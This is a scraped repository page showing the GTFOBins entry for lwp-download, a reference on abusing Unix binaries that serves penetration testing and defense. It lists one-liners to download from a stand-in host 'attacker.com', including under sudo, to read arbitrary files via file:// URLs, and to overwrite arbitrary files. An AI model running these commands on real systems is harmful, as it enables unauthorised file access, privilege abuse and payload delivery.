This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
ecdacfc3ac3fe92d00d4edc0888a1247a7f1f8a1
GTFOBins.github.io
/
_gtfobins
/
lwp-download.md
LinuxSploit
313a49d9f7
Update lwp-download.md
...
lwp-download drop the elevated privileges
2021-04-17 20:56:12 +02:00
662 B
Raw
Blame
History
description, functions
description
functions
Fetch a remote file via HTTP GET request.
file-download
sudo
file-read
file-write
code
URL=
http://attacker.com/file_to_get
LFILE=file_to_save lwp-download $URL $LFILE
code
URL=
http://attacker.com/file_to_get
LFILE=file_to_save sudo lwp-download $URL $LFILE
description
code
The file path must be absolute.
LFILE=file_to_read TF=$(mktemp) lwp-download "file://$LFILE" $TF cat $TF
code
LFILE=file_to_write TF=$(mktemp) echo DATA >$TF lwp-download file://$TF $LFILE
Reference in New Issue
View Git Blame
Copy Permalink